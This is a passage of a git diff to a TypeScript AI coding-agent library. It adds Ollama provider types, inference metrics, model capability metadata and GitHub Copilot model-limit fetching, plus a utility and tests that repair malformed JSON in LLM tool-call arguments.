-		socket.removeEventListener("message", onMessage);
-		socket.removeEventListener("error", onError);
-		socket.removeEventListener("close", onClose);
-		signal?.removeEventListener("abort", onAbort);
+		cleanup();
 	}
 }
 
diff --git a/packages/pi-ai/src/types.ts b/packages/pi-ai/src/types.ts
index af3afc5c8..661b58b57 100644
--- a/packages/pi-ai/src/types.ts
+++ b/packages/pi-ai/src/types.ts
@@ -13,7 +13,8 @@ export type KnownApi =
 	| "bedrock-converse-stream"
 	| "google-generative-ai"
 	| "google-gemini-cli"
-	| "google-vertex";
+	| "google-vertex"
+	| "ollama-chat";
 
 export type Api = KnownApi | (string & {});
 
@@ -43,6 +44,7 @@ export type KnownProvider =
 	| "opencode-go"
 	| "kimi-coding"
 	| "alibaba-coding-plan"
+	| "ollama"
 	| "ollama-cloud";
 export type Provider = KnownProvider | string;
 
@@ -192,7 +194,7 @@ export interface Usage {
 	};
 }
 
-export type StopReason = "stop" | "length" | "toolUse" | "error" | "aborted";
+export type StopReason = "stop" | "length" | "toolUse" | "pauseTurn" | "error" | "aborted";
 
 export interface UserMessage {
 	role: "user";
@@ -211,9 +213,23 @@ export interface AssistantMessage {
 	errorMessage?: string;
 	/** Server-requested retry delay in milliseconds (from Retry-After or rate limit headers). */
 	retryAfterMs?: number;
+	/** Provider inference performance metrics (e.g. tokens/sec from local models). */
+	inferenceMetrics?: InferenceMetrics;
 	timestamp: number; // Unix timestamp in milliseconds
 }
 
+/** Inference performance metrics reported by providers that support it (e.g. Ollama). */
+export interface InferenceMetrics {
+	/** Tokens generated per second during eval phase. */
+	tokensPerSecond: number;
+	/** Wall-clock duration of the full request in milliseconds. */
+	totalDurationMs: number;
+	/** Duration of the eval (generation) phase in milliseconds. */
+	evalDurationMs: number;
+	/** Duration of the prompt eval phase in milliseconds. */
+	promptEvalDurationMs: number;
+}
+
 export interface ToolResultMessage<TDetails = any> {
 	role: "toolResult";
 	toolCallId: string;
@@ -250,10 +266,10 @@ export type AssistantMessageEvent =
 	| { type: "thinking_end"; contentIndex: number; content: string; partial: AssistantMessage }
 	| { type: "toolcall_start"; contentIndex: number; partial: AssistantMessage }
 	| { type: "toolcall_delta"; contentIndex: number; delta: string; partial: AssistantMessage }
-	| { type: "toolcall_end"; contentIndex: number; toolCall: ToolCall; partial: AssistantMessage }
+	| { type: "toolcall_end"; contentIndex: number; toolCall: ToolCall; partial: AssistantMessage; malformedArguments?: boolean }
 	| { type: "server_tool_use"; contentIndex: number; partial: AssistantMessage }
 	| { type: "web_search_result"; contentIndex: number; partial: AssistantMessage }
-	| { type: "done"; reason: Extract<StopReason, "stop" | "length" | "toolUse">; message: AssistantMessage }
+	| { type: "done"; reason: Extract<StopReason, "stop" | "length" | "toolUse" | "pauseTurn">; message: AssistantMessage }
 	| { type: "error"; reason: Extract<StopReason, "aborted" | "error">; error: AssistantMessage };
 
 /**
@@ -318,6 +334,32 @@ export interface VercelGatewayRouting {
 	order?: string[];
 }
 
+/**
+ * Provider-agnostic capability declarations for a model.
+ *
+ * These fields allow models to self-declare supported features so that call
+ * sites can read from metadata rather than pattern-matching on model IDs or
+ * provider names. Add fields here as new cross-provider capabilities emerge.
+ */
+export interface ModelCapabilities {
+	/** Whether the model supports xhigh thinking level. */
+	supportsXhigh?: boolean;
+	/**
+	 * Whether tool call IDs must be included and normalised in tool results for
+	 * this model. Relevant for models deployed cross-provider (e.g. Claude or
+	 * GPT variants via Google APIs) where the host API imposes stricter ID rules.
+	 */
+	requiresToolCallId?: boolean;
+	/** Whether OpenAI-style service tiers (priority/flex) apply to this model. */
+	supportsServiceTier?: boolean;
+	/**
+	 * Approximate characters per token for this model.
+	 * Used as a fallback when an accurate tokenizer is unavailable.
+	 * If omitted, the provider-level default is used.
+	 */
+	charsPerToken?: number;
+}
+
 // Model interface for the unified model system
 export interface Model<TApi extends Api> {
 	id: string;
@@ -342,4 +384,11 @@ export interface Model<TApi extends Api> {
 		: TApi extends "openai-responses"
 			? OpenAIResponsesCompat
 			: never;
+	/**
+	 * Provider-agnostic capability declarations for this model.
+	 * Read these fields instead of pattern-matching on model IDs or provider names.
+	 */
+	capabilities?: ModelCapabilities;
+	/** Opaque provider-specific options. Cast to the appropriate type in the provider's stream handler. */
+	providerOptions?: Record<string, unknown>;
 }
diff --git a/packages/pi-ai/src/utils/event-stream.ts b/packages/pi-ai/src/utils/event-stream.ts
index 74947477e..7eb0a0104 100644
--- a/packages/pi-ai/src/utils/event-stream.ts
+++ b/packages/pi-ai/src/utils/event-stream.ts
@@ -80,3 +80,8 @@ export class AssistantMessageEventStream extends EventStream<AssistantMessageEve
 		);
 	}
 }
+
+/** Factory function for AssistantMessageEventStream (for use by package consumers). */
+export function createAssistantMessageEventStream(): AssistantMessageEventStream {
+	return new AssistantMessageEventStream();
+}
diff --git a/packages/pi-ai/src/utils/json-parse.ts b/packages/pi-ai/src/utils/json-parse.ts
index ad907e8d0..72f934e33 100644
--- a/packages/pi-ai/src/utils/json-parse.ts
+++ b/packages/pi-ai/src/utils/json-parse.ts
@@ -1,14 +1,51 @@
 import { parseStreamingJson as nativeParseStreamingJson } from "@gsd/native";
+import { hasXmlParameterTags, hasYamlBulletLists, repairToolJson } from "./repair-tool-json.js";
 
 /**
  * Attempts to parse potentially incomplete JSON during streaming.
  * Always returns a valid object, even if the JSON is incomplete.
  *
  * Uses the native Rust streaming JSON parser for performance.
+ * Falls back to YAML bullet-list repair when the native parser
+ * returns an empty object from input that contains YAML-style
+ * bullet lists copied from template formatting (#2660).
  *
  * @param partialJson The partial JSON string from streaming
  * @returns Parsed object or empty object if parsing fails
  */
 export function parseStreamingJson<T = any>(partialJson: string | undefined): T {
-	return nativeParseStreamingJson<T>(partialJson);
+	if (!partialJson || partialJson.trim() === "") {
+		return {} as T;
+	}
+
+	// Fast path: try native streaming parser first
+	const result = nativeParseStreamingJson<T>(partialJson);
+
+	// XML parameter tags can be trapped inside otherwise valid JSON strings,
+	// so run repair before trusting the native parse result.
+	if (hasXmlParameterTags(partialJson)) {
+		try {
+			return JSON.parse(repairToolJson(partialJson)) as T;
+		} catch {
+			// Fall through to the native parser result on incomplete partials
+		}
+	}
+
+	// If the native parser returned a non-empty result, use it.
+	// Only attempt repair when the result is empty AND the input
+	// contains YAML bullet patterns (avoids unnecessary work).
+	if (
+		result &&
+		typeof result === "object" &&
+		Object.keys(result as object).length === 0 &&
+		hasYamlBulletLists(partialJson)
+	) {
+		try {
+			return JSON.parse(repairToolJson(partialJson)) as T;
+		} catch {
+			// Repair failed — return the empty object from native parser
+		}
+	}
+
+	return result;
 }
diff --git a/packages/pi-ai/src/utils/oauth/github-copilot.ts b/packages/pi-ai/src/utils/oauth/github-copilot.ts
index 08ffb24d3..eae8e9a5f 100644
--- a/packages/pi-ai/src/utils/oauth/github-copilot.ts
+++ b/packages/pi-ai/src/utils/oauth/github-copilot.ts
@@ -8,6 +8,8 @@ import type { OAuthCredentials, OAuthLoginCallbacks, OAuthProviderInterface } fr
 
 type CopilotCredentials = OAuthCredentials & {
 	enterpriseUrl?: string;
+	/** Model limits from the /models API, keyed by model ID */
+	modelLimits?: Record<string, { contextWindow: number; maxTokens: number }>;
 };
 
 const decode = (s: string) => atob(s);
@@ -305,6 +307,47 @@ async function enableAllGitHubCopilotModels(
 	);
 }
 
+async function fetchCopilotModelLimits(
+	token: string,
+	enterpriseDomain?: string,
+): Promise<Record<string, { contextWindow: number; maxTokens: number }>> {
+	const baseUrl = getGitHubCopilotBaseUrl(token, enterpriseDomain);
+	try {
+		const response = await fetch(`${baseUrl}/models`, {
+			headers: {
+				Accept: "application/json",
+				Authorization: `Bearer ${token}`,
+				"X-GitHub-Api-Version": "2025-05-01",
+				...COPILOT_HEADERS,
+			},
+			signal: AbortSignal.timeout(30_000),
+		});
+		if (!response.ok) return {};
+		const data = (await response.json()) as {
+			data?: Array<{
+				id: string;
+				capabilities?: {
+					limits?: {
+						max_context_window_tokens?: number;
+						max_output_tokens?: number;
+					};
+				};
+			}>;
+		};
+		const limits: Record<string, { contextWindow: number; maxTokens: number }> = {};
+		for (const m of data.data || []) {
+			const ctx = m.capabilities?.limits?.max_context_window_tokens;
+			const out = m.capabilities?.limits?.max_output_tokens;
+			if (typeof ctx === "number" && typeof out === "number" && ctx > 0 && out > 0 && Number.isFinite(ctx) && Number.isFinite(out)) {
+				limits[m.id] = { contextWindow: ctx, maxTokens: out };
+			}
+		}
+		return limits;
+	} catch {
+		return {};
+	}
+}
+
 /**
  * Login with GitHub Copilot OAuth (device code flow)
  *
@@ -351,6 +394,14 @@ export async function loginGitHubCopilot(options: {
 	// Enable all models after successful login
 	options.onProgress?.("Enabling models...");
 	await enableAllGitHubCopilotModels(credentials.access, enterpriseDomain ?? undefined);
+
+	// Fetch real model limits from the Copilot API
+	options.onProgress?.("Fetching model limits...");
+	const modelLimits = await fetchCopilotModelLimits(credentials.access, enterpriseDomain ?? undefined);
+	if (Object.keys(modelLimits).length > 0) {
+		(credentials as CopilotCredentials).modelLimits = modelLimits;
+	}
+
 	return credentials;
 }
 
@@ -369,7 +420,16 @@ export const githubCopilotOAuthProvider: OAuthProviderInterface = {
 
 	async refreshToken(credentials: OAuthCredentials): Promise<OAuthCredentials> {
 		const creds = credentials as CopilotCredentials;
-		return refreshGitHubCopilotToken(creds.refresh, creds.enterpriseUrl);
+		const refreshed = await refreshGitHubCopilotToken(creds.refresh, creds.enterpriseUrl);
+		try {
+			const modelLimits = await fetchCopilotModelLimits(refreshed.access, creds.enterpriseUrl);
+			if (Object.keys(modelLimits).length > 0) {
+				(refreshed as CopilotCredentials).modelLimits = modelLimits;
+			}
+		} catch {
+			// Model limits fetch is best-effort; don't block token refresh
+		}
+		return refreshed;
 	},
 
 	getApiKey(credentials: OAuthCredentials): string {
@@ -380,6 +440,18 @@ export const githubCopilotOAuthProvider: OAuthProviderInterface = {
 		const creds = credentials as CopilotCredentials;
 		const domain = creds.enterpriseUrl ? (normalizeDomain(creds.enterpriseUrl) ?? undefined) : undefined;
 		const baseUrl = getGitHubCopilotBaseUrl(creds.access, domain);
-		return models.map((m) => (m.provider === "github-copilot" ? { ...m, baseUrl } : m));
+		const limits = creds.modelLimits;
+		return models.map((m) => {
+			if (m.provider !== "github-copilot") return m;
+			const modelLimits = limits?.[m.id];
+			return {
+				...m,
+				baseUrl,
+				...(modelLimits && {
+					contextWindow: modelLimits.contextWindow,
+					maxTokens: modelLimits.maxTokens,
+				}),
+			};
+		});
 	},
 };
diff --git a/packages/pi-ai/src/utils/repair-tool-json.ts b/packages/pi-ai/src/utils/repair-tool-json.ts
new file mode 100644
index 000000000..27ea7b14c
--- /dev/null
+++ b/packages/pi-ai/src/utils/repair-tool-json.ts
@@ -0,0 +1,220 @@
+/**
+ * Repair malformed JSON in LLM tool-call arguments.
+ *
+ * LLMs sometimes copy YAML template formatting into JSON tool arguments,
+ * producing patterns like:
+ *
+ *   "keyDecisions": - Used Web Notification API...,
+ *   "keyFiles": - src-tauri/src/lib.rs — Extended...
+ *
+ * instead of valid JSON arrays:
+ *
+ *   "keyDecisions": ["Used Web Notification API..."],
+ *   "keyFiles": ["src-tauri/src/lib.rs — Extended..."]
+ *
+ * This module detects and repairs such patterns before JSON.parse is called.
+ *
+ * @see https://github.com/gsd-build/gsd-2/issues/2660
+ */
+
+/**
+ * Detect whether a JSON string contains YAML-style bullet-list values
+ * (i.e. `"key": - item` instead of `"key": ["item"]`).
+ */
+export function hasYamlBulletLists(json: string): boolean {
+	// Match: "key": followed by whitespace then a dash-space pattern (YAML bullet)
+	// The negative lookahead excludes negative numbers (e.g. "key": -1)
+	return /"\s*:\s*-\s+(?!\d)/.test(json);
+}
+
+/**
+ * Detect whether a JSON string contains XML parameter tags
+ * (i.e. `<parameter name="X">value</parameter>`).
+ *
+ * Some models mix XML tool-call syntax into JSON string values,
+ * producing hybrid output that fails JSON.parse.
+ *
+ * @see https://github.com/gsd-build/gsd-2/issues/3403
+ */
+export function hasXmlParameterTags(json: string): boolean {
+	return /<\/?parameter[\s>]/.test(json);
+}
+
+/**
+ * Detect whether a JSON string contains truncated numeric values
+ * (e.g. `"exitCode": -,` or `"durationMs": ,`).
+ *
+ * Smaller models sometimes emit incomplete numbers when the value
+ * is cut off mid-generation.
+ *
+ * @see https://github.com/gsd-build/gsd-2/issues/3464
+ */
+export function hasTruncatedNumbers(json: string): boolean {
+	// Match: colon, optional whitespace, then a comma or } without a value
+	// Or: colon, optional whitespace, bare minus sign followed by comma/}
+	return /:\s*,/.test(json) || /:\s*-\s*[,}]/.test(json);
+}
+
+type XmlParameterBlock = {
+	name: string;
+	value: unknown;
+};
+
+const xmlParameterBlockPattern = /<parameter\s+name="([^"]+)"\s*>([\s\S]*?)<\/parameter>/g;
+
+function parseXmlParameterValue(raw: string): unknown {
+	const trimmed = raw.trim();
+	if (trimmed === "") return "";
+	try {
+		return JSON.parse(trimmed);
+	} catch {
+		return trimmed;
+	}
+}
+
+function extractXmlParameterBlocks(text: string): XmlParameterBlock[] {
+	const blocks: XmlParameterBlock[] = [];
+	for (const match of text.matchAll(xmlParameterBlockPattern)) {
+		blocks.push({
+			name: match[1],
+			value: parseXmlParameterValue(match[2] ?? ""),
+		});
+	}
+	return blocks;
+}
+
+function trimLeakedXmlTail(fieldName: string, value: string): string {
+	let cut = value.length;
+	const parameterIndex = value.indexOf("<parameter");
+	if (parameterIndex >= 0) cut = Math.min(cut, parameterIndex);
+
+	const closingTagIndex = value.indexOf(`</${fieldName}>`);
+	if (closingTagIndex >= 0) cut = Math.min(cut, closingTagIndex);
+
+	return value.slice(0, cut).trimEnd();
+}
+
+/**
+ * Strip XML `<parameter>` tags from a JSON string, leaving only the
+ * text content. This handles the case where the LLM mixes XML
+ * tool-call format into JSON string values.
+ */
+function stripXmlParameterTags(json: string): string {
+	// Remove opening tags: <parameter name="X">
+	let cleaned = json.replace(/<parameter\s+name="[^"]*"\s*>/g, "");
+	// Remove closing tags: </parameter>
+	cleaned = cleaned.replace(/<\/parameter>/g, "");
+	return cleaned;
+}
+
+function promoteXmlParametersToTopLevel(json: string): string {
+	try {
+		const parsed = JSON.parse(json) as Record<string, unknown>;
+		if (!parsed || typeof parsed !== "object" || Array.isArray(parsed)) {
+			return stripXmlParameterTags(json);
+		}
+
+		let changed = false;
+		for (const [fieldName, value] of Object.entries(parsed)) {
+			if (typeof value !== "string" || !hasXmlParameterTags(value)) continue;
+
+			const blocks = extractXmlParameterBlocks(value);
+			if (blocks.length === 0) continue;
+
+			parsed[fieldName] = trimLeakedXmlTail(fieldName, value);
+			for (const block of blocks) {
+				if (!(block.name in parsed)) {
+					parsed[block.name] = block.value;
+				}
+			}
+			changed = true;
+		}
+
+		return changed ? JSON.stringify(parsed) : stripXmlParameterTags(json);
+	} catch {
+		return stripXmlParameterTags(json);
+	}
+}
+
+/**
+ * Replace truncated numeric values with 0.
+ * Handles: `"key": ,` → `"key": 0,` and `"key": -,` → `"key": 0,`
+ */
+function repairTruncatedNumbers(json: string): string {
+	// Bare comma after colon (missing value entirely)
+	let repaired = json.replace(/:\s*,/g, ": 0,");
+	// Bare minus sign followed by comma or closing brace
+	repaired = repaired.replace(/:\s*-\s*([,}])/g, ": 0$1");
+	return repaired;
+}
+
+/**
+ * Attempt to repair malformed JSON in LLM tool-call arguments.
+ *
+ * Handles three categories of malformation:
+ *
+ * 1. **YAML bullet lists** (#2660): `"key": - item1\n  - item2` → `"key": ["item1", "item2"]`
+ * 2. **XML parameter tags** (#3403): `<parameter name="X">value</parameter>` → stripped to content
+ * 3. **Truncated numbers** (#3464): `"exitCode": -,` → `"exitCode": 0,`
+ *
+ * Returns the original string unchanged if no patterns are detected
+ * or if the repair itself would produce invalid JSON.
+ */
+export function repairToolJson(json: string): string {
+	let repaired = json;
+
+	// Phase 1: Strip XML parameter tags
+	if (hasXmlParameterTags(repaired)) {
+		repaired = promoteXmlParametersToTopLevel(repaired);
+	}
+
+	// Phase 2: Repair truncated numbers
+	if (hasTruncatedNumbers(repaired)) {
+		repaired = repairTruncatedNumbers(repaired);
+	}
+
+	// Phase 3: Repair YAML bullet lists
+	if (!hasYamlBulletLists(repaired)) {
+		return repaired;
+	}
+
+	// Strategy: find each `"key": - item1\n  - item2\n  - item3` region and
+	// wrap items in a JSON array.
+	//
+	// We work on the raw string because the JSON is not parseable yet.
+	// The pattern we target:
+	//   "someKey":\s*- item text (possibly multiline)
+	//   optionally followed by more `- item` lines
+	//   terminated by the next `"key":` or `}` or end of string.
+
+	// Match a key followed by YAML-style bullet list.
+	// Capture: (1) the key portion including colon, (2) the bullet-list body,
+	// (3) the separator (comma or empty) before the next key/bracket.
+	// The bullet list body ends at the next `"key":` or `}` or `]` or end of string.
+	const keyBulletPattern =
+		/("(?:[^"\\]|\\.)*"\s*:\s*)(- .+?)(,?\s*)(?="(?:[^"\\]|\\.)*"\s*:|[}\]]|$)/gs;
+
+	repaired = repaired.replace(
+		keyBulletPattern,
+		(_match, keyPart: string, bulletBody: string, separator: string) => {
+			// Split the bullet body into individual items on `- ` boundaries.
+			// Items may contain embedded newlines for multi-line values.
+			const items = bulletBody
+				.split(/\n?\s*- /)
+				.filter((s) => s.trim().length > 0)
+				.map((s) => s.replace(/,\s*$/, "").trim());
+
+			// JSON-encode each item as a string, then wrap in an array.
+			const jsonArray = "[" + items.map((item) => JSON.stringify(item)).join(", ") + "]";
+
+			// Re-emit the separator (comma) so the next key is properly delimited
+			const sep = separator.trim() ? separator : (/^\s*"/.test(separator + "x") ? ", " : "");
+			return keyPart + jsonArray + sep;
+		},
+	);
+
+	// Strip trailing commas before } or ] (common in repaired JSON)
+	repaired = repaired.replace(/,(\s*[}\]])/g, "$1");
+
+	return repaired;
+}
diff --git a/packages/pi-ai/src/utils/tests/json-parse.test.ts b/packages/pi-ai/src/utils/tests/json-parse.test.ts
new file mode 100644
index 000000000..1ce50751a
--- /dev/null
+++ b/packages/pi-ai/src/utils/tests/json-parse.test.ts
@@ -0,0 +1,17 @@
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { parseStreamingJson } from "../json-parse.js";
+
+describe("parseStreamingJson — XML parameter recovery (#3751)", () => {
+	test("promotes XML parameters trapped inside valid JSON string values", () => {
+		const malformed =
+			'{"narrative":"text.</narrative>\\n<parameter name=\\"verification\\">all tests pass</parameter>\\n<parameter name=\\"verificationEvidence\\">[\\"npm test\\"]</parameter>","oneLiner":"done"}';
+
+		const parsed = parseStreamingJson<Record<string, unknown>>(malformed);
+
+		assert.equal(parsed.narrative, "text.");
+		assert.equal(parsed.verification, "all tests pass");
+		assert.deepEqual(parsed.verificationEvidence, ["npm test"]);
+		assert.equal(parsed.oneLiner, "done");
+	});
+});
diff --git a/packages/pi-ai/src/utils/tests/repair-tool-json.test.ts b/packages/pi-ai/src/utils/tests/repair-tool-json.test.ts
new file mode 100644
index 000000000..433f6efc0
--- /dev/null
+++ b/packages/pi-ai/src/utils/tests/repair-tool-json.test.ts
@@ -0,0 +1,208 @@
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { repairToolJson, hasYamlBulletLists, hasXmlParameterTags, hasTruncatedNumbers } from "../repair-tool-json.js";
+
+describe("repairToolJson — YAML bullet list repair (#2660)", () => {
+	// ── Detection ──────────────────────────────────────────────────────────
+
+	test("hasYamlBulletLists detects YAML-style bullets", () => {
+		assert.equal(
+			hasYamlBulletLists('"keyDecisions": - Used Web Notification API'),
+			true,
+		);
+	});
+
+	test("hasYamlBulletLists ignores negative numbers", () => {
+		assert.equal(
+			hasYamlBulletLists('"offset": -1'),
+			false,
+			"negative number should not be detected as YAML bullet",
+		);
+	});
+
+	test("hasYamlBulletLists returns false for valid JSON", () => {
+		assert.equal(
+			hasYamlBulletLists('{"keyDecisions": ["item1", "item2"]}'),
+			false,
+		);
+	});
+
+	// ── Single bullet item ────────────────────────────────────────────────
+
+	test("repairs single YAML bullet to JSON array", () => {
+		const malformed = '{"keyDecisions": - Used Web Notification API}';
+		const repaired = repairToolJson(malformed);
+		const parsed = JSON.parse(repaired);
+		assert.deepEqual(parsed.keyDecisions, ["Used Web Notification API"]);
+	});
+
+	// ── Multiple bullet items (newline-separated) ─────────────────────────
+
+	test("repairs multiple YAML bullets separated by newlines", () => {
+		const malformed =
+			'{"keyDecisions": - Used Web Notification API\n  - Chose Tauri over Electron\n  - Adopted SQLite for storage, "title": "M005"}';
+		const repaired = repairToolJson(malformed);
+		const parsed = JSON.parse(repaired);
+		assert.deepEqual(parsed.keyDecisions, [
+			"Used Web Notification API",
+			"Chose Tauri over Electron",
+			"Adopted SQLite for storage",
+		]);
+		assert.equal(parsed.title, "M005");
+	});
+
+	// ── Multiple fields with YAML bullets ─────────────────────────────────
+
+	test("repairs multiple fields each with YAML bullet lists", () => {
+		const malformed =
+			'{"keyDecisions": - decision one\n  - decision two, "keyFiles": - src/lib.rs — Extended menu\n  - src/main.ts — Entry point, "title": "done"}';
+		const repaired = repairToolJson(malformed);
+		const parsed = JSON.parse(repaired);
+		assert.deepEqual(parsed.keyDecisions, ["decision one", "decision two"]);
+		assert.deepEqual(parsed.keyFiles, [
+			"src/lib.rs \u2014 Extended menu",
+			"src/main.ts \u2014 Entry point",
+		]);
+		assert.equal(parsed.title, "done");
+	});
+
+	// ── Exact reproduction from issue #2660 ───────────────────────────────
+
+	test("repairs the exact malformed JSON from issue #2660", () => {
+		const malformed = `{"milestoneId": "M005", "title": "Native Desktop Polish", "oneLiner": "summary", "narrative": "details", "successCriteriaResults": "all pass", "definitionOfDoneResults": "all done", "requirementOutcomes": "met", "keyDecisions": - Used Web Notification API (new window.Notification()) instead of Tauri sendNotification wrapper, "keyFiles": - src-tauri/src/lib.rs \u2014 Extended menu builder with notification toggle, "lessonsLearned": - Always test notification permissions before sending, "followUps": "none", "deviations": "none", "verificationPassed": true}`;
+
+		const repaired = repairToolJson(malformed);
+		const parsed = JSON.parse(repaired);
+
+		assert.equal(parsed.milestoneId, "M005");
+		assert.equal(parsed.title, "Native Desktop Polish");
+		assert.ok(Array.isArray(parsed.keyDecisions), "keyDecisions should be an array");
+		assert.ok(parsed.keyDecisions[0].includes("Web Notification API"));
+		assert.ok(Array.isArray(parsed.keyFiles), "keyFiles should be an array");
+		assert.ok(parsed.keyFiles[0].includes("src-tauri/src/lib.rs"));
+		assert.ok(Array.isArray(parsed.lessonsLearned), "lessonsLearned should be an array");
+		assert.equal(parsed.verificationPassed, true);
+	});
+
+	// ── Passthrough for valid JSON ────────────────────────────────────────
+
+	test("returns valid JSON unchanged", () => {
+		const valid = '{"keyDecisions": ["item1", "item2"], "count": -5}';
+		const result = repairToolJson(valid);
+		assert.equal(result, valid, "valid JSON should be returned unchanged");
+	});
+
+	// ── Negative numbers are preserved ────────────────────────────────────
+
+	test("does not mangle negative numbers", () => {
+		const valid = '{"offset": -1, "limit": -100}';
+		const result = repairToolJson(valid);
+		assert.equal(result, valid);
+	});
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// XML parameter tag repair (#3403)
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe("repairToolJson — XML parameter tag stripping (#3403)", () => {
+	test("hasXmlParameterTags detects opening tags", () => {
+		assert.equal(
+			hasXmlParameterTags('<parameter name="narrative">some text</parameter>'),
+			true,
+		);
+	});
+
+	test("hasXmlParameterTags returns false for clean JSON", () => {
+		assert.equal(
+			hasXmlParameterTags('{"narrative": "some text"}'),
+			false,
+		);
+	});
+
+	test("strips XML parameter tags from JSON values", () => {
+		const malformed = '{"sliceId": "S03", "narrative": <parameter name="narrative">The slice work</parameter>}';
+		const repaired = repairToolJson(malformed);
+		// After stripping tags, the content should be parseable or at least tag-free
+		assert.ok(!repaired.includes("<parameter"), "should not contain <parameter tags");
+		assert.ok(!repaired.includes("</parameter>"), "should not contain </parameter> tags");
+	});
+
+	test("handles mixed XML and JSON content", () => {
+		const malformed = '{"oneLiner": "done", "verification": <parameter name="verification">all tests pass</parameter>}';
+		const repaired = repairToolJson(malformed);
+		assert.ok(!repaired.includes("<parameter"), "XML tags should be stripped");
+		assert.ok(repaired.includes("all tests pass"), "content should be preserved");
+	});
+
+	test("promotes XML parameters trapped inside valid JSON string values", () => {
+		const malformed =
+			'{"narrative":"text.</narrative>\\n<parameter name=\\"verification\\">all tests pass</parameter>\\n<parameter name=\\"verificationEvidence\\">[\\"npm test\\"]</parameter>","oneLiner":"done"}';
+		const repaired = repairToolJson(malformed);
+		const parsed = JSON.parse(repaired);
+
+		assert.equal(parsed.narrative, "text.");
+		assert.equal(parsed.verification, "all tests pass");
+		assert.deepEqual(parsed.verificationEvidence, ["npm test"]);
+		assert.equal(parsed.oneLiner, "done");
+		assert.ok(!parsed.narrative.includes("<parameter"), "narrative should not retain leaked XML");
+	});
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Truncated number repair (#3464)
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe("repairToolJson — truncated number repair (#3464)", () => {
+	test("hasTruncatedNumbers detects bare comma after colon", () => {
+		assert.equal(hasTruncatedNumbers('"exitCode": ,'), true);
+	});
+
+	test("hasTruncatedNumbers detects bare minus before comma", () => {
+		assert.equal(hasTruncatedNumbers('"exitCode": -,'), true);
+	});
+
+	test("hasTruncatedNumbers detects bare minus before closing brace", () => {
+		assert.equal(hasTruncatedNumbers('"durationMs": -}'), true);
+	});
+
+	test("hasTruncatedNumbers returns false for valid numbers", () => {
+		assert.equal(hasTruncatedNumbers('"exitCode": 0, "durationMs": 1234'), false);
+	});
+
+	test("hasTruncatedNumbers returns false for negative numbers", () => {
+		assert.equal(hasTruncatedNumbers('"exitCode": -1, "offset": -100'), false);
+	});
+
+	test("repairs truncated exitCode with bare comma", () => {
+		const malformed = '{"command": "npm test", "exitCode": , "verdict": "pass", "durationMs": 500}';
+		const repaired = repairToolJson(malformed);
+		const parsed = JSON.parse(repaired);
+		assert.equal(parsed.exitCode, 0);
+		assert.equal(parsed.durationMs, 500);
+	});
+
+	test("repairs truncated exitCode with bare minus", () => {
+		const malformed = '{"command": "npm test", "exitCode": -, "verdict": "pass", "durationMs": 1234}';
+		const repaired = repairToolJson(malformed);
+		const parsed = JSON.parse(repaired);
+		assert.equal(parsed.exitCode, 0);
+		assert.equal(parsed.verdict, "pass");
+	});
+
+	test("repairs truncated durationMs at end of object", () => {
+		const malformed = '{"command": "npm test", "exitCode": 0, "verdict": "pass", "durationMs": -}';
+		const repaired = repairToolJson(malformed);
+		const parsed = JSON.parse(repaired);
+		assert.equal(parsed.durationMs, 0);
+		assert.equal(parsed.exitCode, 0);
+	});
+
+	test("does not mangle valid negative numbers", () => {
+		const valid = '{"exitCode": -1, "offset": -100}';
+		const repaired = repairToolJson(valid);
+		const parsed = JSON.parse(repaired);
+		assert.equal(parsed.exitCode, -1);
+		assert.equal(parsed.offset, -100);
+	});
+});
diff --git a/packages/pi-coding-agent/package.json b/packages/pi-coding-agent/package.json
index 7b99a5490..9561c73a4 100644
--- a/packages/pi-coding-agent/package.json
+++ b/packages/pi-coding-agent/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@gsd/pi-coding-agent",
-  "version": "2.41.0",
+  "version": "2.67.0",
   "description": "Coding agent CLI (vendored from pi-mono)",
   "type": "module",
   "piConfig": {
diff --git a/packages/pi-coding-agent/pnpm-lock.yaml b/packages/pi-coding-agent/pnpm-lock.yaml
deleted file mode 100644
index 32e860496..000000000
--- a/packages/pi-coding-agent/pnpm-lock.yaml
+++ /dev/null
@@ -1,454 +0,0 @@
-lockfileVersion: '9.0'
-
-settings:
-  autoInstallPeers: true
-  excludeLinksFromLockfile: false
-
-importers:
-
-  .:
-    dependencies:
-      '@mariozechner/jiti':
-        specifier: ^2.6.2
-        version: 2.6.5
-      '@silvia-odwyer/photon-node':
-        specifier: ^0.3.4
-        version: 0.3.4
-      chalk:
-        specifier: ^5.5.0
-        version: 5.6.2
-      diff:
-        specifier: ^8.0.2
-        version: 8.0.3
-      extract-zip:
-        specifier: ^2.0.1
-        version: 2.0.1
-      file-type:
-        specifier: ^21.1.1
-        version: 21.3.2
-      glob:
-        specifier: ^13.0.1
-        version: 13.0.6
-      hosted-git-info:
-        specifier: ^9.0.2
-        version: 9.0.2
-      ignore:
-        specifier: ^7.0.5
-        version: 7.0.5
-      marked:
-        specifier: ^15.0.12
-        version: 15.0.12
-      minimatch:
-        specifier: ^10.2.3
-        version: 10.2.4
-      proper-lockfile:
-        specifier: ^4.1.2
-        version: 4.1.2
-      sql.js:
-        specifier: ^1.14.1
-        version: 1.14.1
-      strip-ansi:
-        specifier: ^7.1.0
-        version: 7.2.0
-      undici:
-        specifier: ^7.24.2
-        version: 7.24.4
-      yaml:
-        specifier: ^2.8.2
-        version: 2.8.2
-    devDependencies:
-      '@types/diff':
-        specifier: ^7.0.2
-        version: 7.0.2
-      '@types/hosted-git-info':
-        specifier: ^3.0.5
-        version: 3.0.5
-      '@types/proper-lockfile':
-        specifier: ^4.1.4
-        version: 4.1.4
-      '@types/sql.js':
-        specifier: ^1.4.9
-        version: 1.4.9
-
-packages:
-
-  '@borewit/text-codec@0.2.2':
-    resolution: {integrity: sha512-DDaRehssg1aNrH4+2hnj1B7vnUGEjU6OIlyRdkMd0aUdIUvKXrJfXsy8LVtXAy7DRvYVluWbMspsRhz2lcW0mQ==}
-
-  '@mariozechner/jiti@2.6.5':
-    resolution: {integrity: sha512-faGUlTcXka5l7rv0lP3K3vGW/ejRuOS24RR2aSFWREUQqzjgdsuWNo/IiPqL3kWRGt6Ahl2+qcDAwtdeWeuGUw==}
-    hasBin: true
-
-  '@silvia-odwyer/photon-node@0.3.4':
